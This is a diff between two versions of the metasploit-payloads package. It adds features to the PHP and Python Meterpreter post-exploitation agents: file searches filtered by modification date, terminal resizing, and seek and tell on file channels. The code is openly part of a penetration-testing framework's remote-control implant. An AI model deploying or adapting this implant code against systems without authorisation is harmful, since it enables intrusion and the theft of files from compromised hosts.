metasploit-payloads 2.0.54 → 2.0.58

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 1db85f55664f5f23616d2e8964b8e489edfa02438b43cfff65cf725a9d18cfd2
-  data.tar.gz: e235a4c2d27623670395f3380360d55657cb7dc764c01471e6e99adef2442ec5
+  metadata.gz: a58e73e2dbd154fef6fca2f4ced7bfc6810c553ce18382641439b558f194f4eb
+  data.tar.gz: b64ae99e93c956aa973358ebf391d72ef5911a97ccff7285180c118fdfcafd2f
 SHA512:
-  metadata.gz: 659af5c06e7763acdfabd5f503fb5ce5a184638268df0358d12f20eab555079f76b40b043609d61655308d66d678813b26ae2c4a2db1cc02c317ab9f5e59d957
-  data.tar.gz: 7986adc790b342d080616e67fcf29f648d693b6176a7ec031b97d7074098503c386cfd6b3c1bc40d979a2028fd8ee1b5891212387f03affcd01d4a41587cb27e
+  metadata.gz: 033ac0bcf5e8fea4b0a1fe99f4e95c3b7f1004b83071a1bd6c00c03a583550dc0f5ee222007b97da26579c17e97880da2e929412498dedf205a4e2b98febc0d9
+  data.tar.gz: 5393ec39455bfb49987c56ef4577a352f3e051646ef4290a7d8f333de433c73f35ed085a1934fdcee5d6248db70f0e124c2cad97c9b712b85b31cd9acae1fab5

data/data/meterpreter/ext_server_stdapi.php

@@ -27,7 +27,9 @@ define("TLV_TYPE_SEARCH_RECURSE",      TLV_META_TYPE_BOOL    | 1230);
 define("TLV_TYPE_SEARCH_GLOB",         TLV_META_TYPE_STRING  | 1231);
 define("TLV_TYPE_SEARCH_ROOT",         TLV_META_TYPE_STRING  | 1232);
 define("TLV_TYPE_SEARCH_RESULTS",      TLV_META_TYPE_GROUP   | 1233);
-
+define("TLV_TYPE_SEARCH_MTIME",        TLV_META_TYPE_UINT    | 1235);
+define("TLV_TYPE_SEARCH_M_START_DATE", TLV_META_TYPE_UINT    | 1236);
+define("TLV_TYPE_SEARCH_M_END_DATE",   TLV_META_TYPE_UINT    | 1237);
 define("TLV_TYPE_FILE_MODE_T",         TLV_META_TYPE_UINT    | 1234);
 
 ##
@@ -340,7 +342,7 @@ define('GLOB_RECURSE',2048);
  *   GLOB_NODOTS, GLOB_RECURSE
  */
 if (!function_exists('safe_glob')) {
-function safe_glob($pattern, $flags=0) {
+function safe_glob($pattern, $flags=0, $start_date=null, $end_date=null) {
     $split=explode('/',str_replace('\\','/',$pattern));
     $mask=array_pop($split);
     $path=implode('/',$split);
@@ -356,14 +358,21 @@ function safe_glob($pattern, $flags=0) {
                     && (!is_link($path."/".$file))
                 )
             ) {
-                $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
-                    ($flags&GLOB_PATH?'':$file.'/')));
+                $newglob = safe_glob($path.'/'.$file.'/'.$mask, $flags, $start_date, $end_date);
+                if ($newglob !== false) {
+                    $glob = array_merge($glob, array_prepend($newglob,
+                        ($flags&GLOB_PATH?'':$file.'/')));
+                }
             }
             // Match file mask
             if (fnmatch($mask,$file)) {
+                $tmp_f_stat = stat($path.'/'.$file);
+                $mtime = $tmp_f_stat['mtime'];
                 if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
                     && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
-                    && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
+                    && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) )
+                    && ( ($start_date === null) || ($start_date <= $mtime))
+                    && ( ($end_date === null) || ($end_date >= $mtime)) )
                     $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
             }
         }
@@ -682,27 +691,38 @@ function stdapi_fs_search($req, &$pkt) {
     $glob = canonicalize_path($glob_tlv['value']);
     $recurse_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_RECURSE);
     $recurse = $recurse_tlv['value'];
+    $start_date_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_M_START_DATE);
+    $start_date = null;
+    if ($start_date_tlv) {
+        $start_date = $start_date_tlv['value'];
+    }
+    $end_date_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_M_END_DATE);
+    $end_date = null;
+    if ($end_date_tlv) {
+        $end_date = $end_date_tlv['value'];
+    }
 
     if (!$root) {
         $root = '.';
     }
 
     my_print("glob: $glob, root: $root, recurse: $recurse");
-    $flags = GLOB_PATH;
+    $flags = GLOB_PATH | GLOB_NODOTS;
     if ($recurse) {
         $flags |= GLOB_RECURSE;
     }
-    $files = safe_glob($root ."/". $glob, $flags);
+    $files = safe_glob($root ."/". $glob, $flags, $start_date, $end_date);
     if ($files and is_array($files)) {
         dump_array($files);
         foreach ($files as $file) {
             $file_tlvs = "";
             $s = stat($file);
-            $p = dirname($file);
-            $f = basename($file);
+            $p = canonicalize_path(dirname($file));
+            $f = canonicalize_path(basename($file));
             $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_PATH, $p));
             $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_NAME, $f));
             $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_SIZE, $s['size']));
+            $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_SEARCH_MTIME, $s['mtime']));
             packet_add_tlv($pkt, create_tlv(TLV_TYPE_SEARCH_RESULTS, $file_tlvs));
         }
     }
@@ -756,12 +776,12 @@ function stdapi_sys_config_getuid($req, &$pkt) {
     if (is_callable('posix_getuid')) {
         $uid = posix_getuid();
         $pwinfo = posix_getpwuid($uid);
-        $user = $pwinfo['name'] . " ($uid)";
+        $user = $pwinfo['name'];
     } else {
         # The posix functions aren't available, this is probably windows.  Use
         # the functions for getting user name and uid based on file ownership
         # instead.
-        $user = get_current_user() . " (" . getmyuid() . ")";
+        $user = get_current_user();
     }
     my_print("getuid - returning: " . $user);
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));

data/data/meterpreter/ext_server_stdapi.py

@@ -39,6 +39,12 @@ try:
 except ImportError:
     has_termios = False
 
+try:
+    import fcntl
+    has_fcntl = True
+except ImportError:
+    has_fcntl = False
+
 try:
     import _winreg as winreg
     has_winreg = True
@@ -468,6 +474,9 @@ TLV_TYPE_SEARCH_ROOT           = TLV_META_TYPE_STRING  | 1232
 TLV_TYPE_SEARCH_RESULTS        = TLV_META_TYPE_GROUP   | 1233
 
 TLV_TYPE_FILE_MODE_T           = TLV_META_TYPE_UINT    | 1234
+TLV_TYPE_SEARCH_MTIME          = TLV_META_TYPE_UINT    | 1235
+TLV_TYPE_SEARCH_M_START_DATE   = TLV_META_TYPE_UINT    | 1236
+TLV_TYPE_SEARCH_M_END_DATE     = TLV_META_TYPE_UINT    | 1237
 
 ##
 # Net
@@ -610,6 +619,9 @@ TLV_TYPE_REGISTER_SIZE         = TLV_META_TYPE_UINT    | 2541
 TLV_TYPE_REGISTER_VALUE_32     = TLV_META_TYPE_UINT    | 2542
 TLV_TYPE_REGISTER              = TLV_META_TYPE_GROUP   | 2550
 
+TLV_TYPE_TERMINAL_ROWS         = TLV_META_TYPE_UINT    | 2600
+TLV_TYPE_TERMINAL_COLUMNS      = TLV_META_TYPE_UINT    | 2601
+
 ##
 # Ui
 ##
@@ -1159,7 +1171,6 @@ def stdapi_sys_process_execute(request, response):
             if has_termios:
                 try:
                     settings = termios.tcgetattr(master)
-                    settings[3] = settings[3] & ~termios.ECHO
                     termios.tcsetattr(master, termios.TCSADRAIN, settings)
                 except:
                     pass
@@ -1510,20 +1521,36 @@ def stdapi_fs_search(request, response):
     search_root = unicode(search_root)
     glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
     recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
+    start_date = packet_get_tlv(request,TLV_TYPE_SEARCH_M_START_DATE)
+    end_date = packet_get_tlv(request,TLV_TYPE_SEARCH_M_END_DATE)
     if recurse:
         for root, dirs, files in os.walk(search_root):
             for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
+                file_stat = os.stat(os.path.join(root, f))
+                mtime = int(file_stat.st_mtime)
+                if start_date and start_date['value'] > mtime:
+                    continue
+                if end_date and end_date['value'] < mtime:
+                    continue
                 file_tlv  = bytes()
                 file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
                 file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
-                file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
+                file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, file_stat.st_size)
+                file_tlv += tlv_pack(TLV_TYPE_SEARCH_MTIME, mtime)
                 response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
     else:
         for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
+            file_stat = os.stat(os.path.join(search_root, f))
+            mtime = int(file_stat.st_mtime)
+            if start_date and start_date['value'] > mtime:
+                continue
+            if end_date and end_date['value'] < mtime:
+                continue
             file_tlv  = bytes()
             file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
             file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
-            file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
+            file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, file_stat.st_size)
+            file_tlv += tlv_pack(TLV_TYPE_SEARCH_MTIME, mtime)
             response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
     return ERROR_SUCCESS, response
 
@@ -2549,3 +2576,16 @@ def stdapi_ui_get_idle_time(request, response):
     idle_time = (GetTickCount() - info.dwTime) / 1000
     response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
     return ERROR_SUCCESS, response
+
+@register_function_if(has_termios and has_fcntl)
+def stdapi_sys_process_set_term_size(request, response):
+    channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+    rows = packet_get_tlv(request, TLV_TYPE_TERMINAL_ROWS)['value']
+    columns = packet_get_tlv(request, TLV_TYPE_TERMINAL_COLUMNS)['value']
+    if channel_id in meterpreter.interact_channels:
+        proc_h = meterpreter.channels[channel_id].proc_h
+        winsize = struct.pack("HHHH", rows, columns, 0, 0)
+        fcntl.ioctl(proc_h.stdin, termios.TIOCSWINSZ, winsize)
+    else:
+        return ERROR_FAILURE, response
+    return ERROR_SUCCESS, response

data/data/meterpreter/meterpreter.py

@@ -347,6 +347,8 @@ COMMAND_IDS = (
     (1115, 'stdapi_audio_mic_start'),
     (1116, 'stdapi_audio_mic_stop'),
     (1117, 'stdapi_audio_mic_list'),
+    (1118, 'stdapi_sys_process_set_term_size'),
+
 )
 # ---------------------------------------------------------------
 
@@ -594,6 +596,16 @@ class MeterpreterChannel(object):
         response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
         return ERROR_SUCCESS, response
 
+    def core_seek(self, request, response):
+        offset = packet_get_tlv(request, TLV_TYPE_SEEK_OFFSET)['value']
+        whence = packet_get_tlv(request, TLV_TYPE_SEEK_WHENCE)['value']
+        self.seek(offset, whence)
+        return ERROR_SUCCESS, response
+
+    def core_tell(self, request, response):
+        response += tlv_pack(TLV_TYPE_SEEK_POS, self.tell())
+        return ERROR_SUCCESS, response
+
     def close(self):
         raise NotImplementedError()
 
@@ -612,6 +624,12 @@ class MeterpreterChannel(object):
     def write(self, data):
         raise NotImplementedError()
 
+    def seek(self, offset, whence=os.SEEK_SET):
+        raise NotImplementedError()
+
+    def tell(self):
+        raise NotImplementedError()
+
 #@export
 class MeterpreterFile(MeterpreterChannel):
     def __init__(self, file_obj):
@@ -630,6 +648,12 @@ class MeterpreterFile(MeterpreterChannel):
     def write(self, data):
         self.file_obj.write(data)
         return len(data)
+
+    def seek(self, offset, whence=os.SEEK_SET):
+        self.file_obj.seek(offset, whence)
+
+    def tell(self):
+        return self.file_obj.tell()
 export(MeterpreterFile)
 
 #@export
@@ -1563,7 +1587,7 @@ class PythonMeterpreter(object):
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
         status, response = channel.core_eof(request, response)
-        return ERROR_SUCCESS, response
+        return status, response
 
     def _core_channel_interact(self, request, response):
         channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
@@ -1603,6 +1627,20 @@ class PythonMeterpreter(object):
             self.handle_dead_resource_channel(channel_id)
         return status, response
 
+    def _core_channel_seek(self, request, response):
+        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+        if channel_id not in self.channels:
+            return ERROR_FAILURE, response
+        channel = self.channels[channel_id]
+        return channel.core_seek(request, response)
+
+    def _core_channel_tell(self, request, response):
+        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+        if channel_id not in self.channels:
+            return ERROR_FAILURE, response
+        channel = self.channels[channel_id]
+        return channel.core_tell(request, response)
+
     def create_response(self, request):
         response = struct.pack('>I', PACKET_TYPE_RESPONSE)
         commd_id_tlv = packet_get_tlv(request, TLV_TYPE_COMMAND_ID)

data/lib/metasploit-payloads/version.rb

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.54'
+  VERSION = '2.0.58'
 
   def self.version
     VERSION

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.54
+  version: 2.0.58
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2021-08-27 00:00:00.000000000 Z
+date: 2021-09-28 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake